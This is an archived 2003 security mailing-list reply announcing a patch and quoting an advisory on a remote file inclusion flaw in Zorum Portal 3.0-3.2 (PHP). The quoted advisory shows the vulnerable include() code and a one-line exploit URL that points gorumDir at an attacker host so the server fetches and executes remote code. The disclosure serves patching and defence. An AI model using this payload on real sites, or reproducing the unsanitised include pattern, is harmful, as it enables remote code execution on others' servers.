Re: Zorum Portal (PHP)

From: Frog Man (leseulfrogat_private)
Date: Sun Jan 26 2003 - 11:03:49 PST

Next message: EnGarde Secure Linux: "[Full-Disclosure] [ESA-20030127-001] MySQL vulnerabilities"

Previous message: Wojciech Purczynski: "[VulnWatch] Sun Microsystems Solaris at -r job name handling and race condition vulnerabilities"
Next in thread: Messer: "Re[2]: Zorum Portal (PHP)"
Reply: Messer: "Re[2]: Zorum Portal (PHP)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

A patch has been created for this hole and can be found on 
http://www.phpsecure.org/.






>From: MGhz <magasat_private>
>To: bugtraqat_private
>Subject: Zorum Portal  (PHP)
>Date: 22 Jan 2003 19:45:26 -0000
>
>
>
>Version : 3.0;3.1;3.2
>Website : http://zorum.phpoutsourcing.com/
>Problem : Include file
>
>
>File:
>---------------------------------
>include.php
>---------------------------------
>
>PHP Code:
>---------------------------------
>[...]
>include("$gorumDir/generformlib_multipleselection.php");
>include("$gorumDir/generformlib_groupselection.php");
>include("$gorumDir/generformlib_filebutton.php");
>include("$gorumDir/group.php");
>[...]
>---------------------------------
>
>Exploit :
>---------------------------------
>http://[target]/[forum_dir]/include.php?gorumDir=http://[attacker]/
>-->
>include http://[attacker]/group.php on remote server
>---------------------------------
>
>--
>magasat_private


_________________________________________________________________

Next message: EnGarde Secure Linux: "[Full-Disclosure] [ESA-20030127-001] MySQL vulnerabilities"
Previous message: Wojciech Purczynski: "[VulnWatch] Sun Microsystems Solaris at -r job name handling and race condition vulnerabilities"
Next in thread: Messer: "Re[2]: Zorum Portal (PHP)"
Reply: Messer: "Re[2]: Zorum Portal (PHP)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Jan 27 2003 - 08:57:28 PST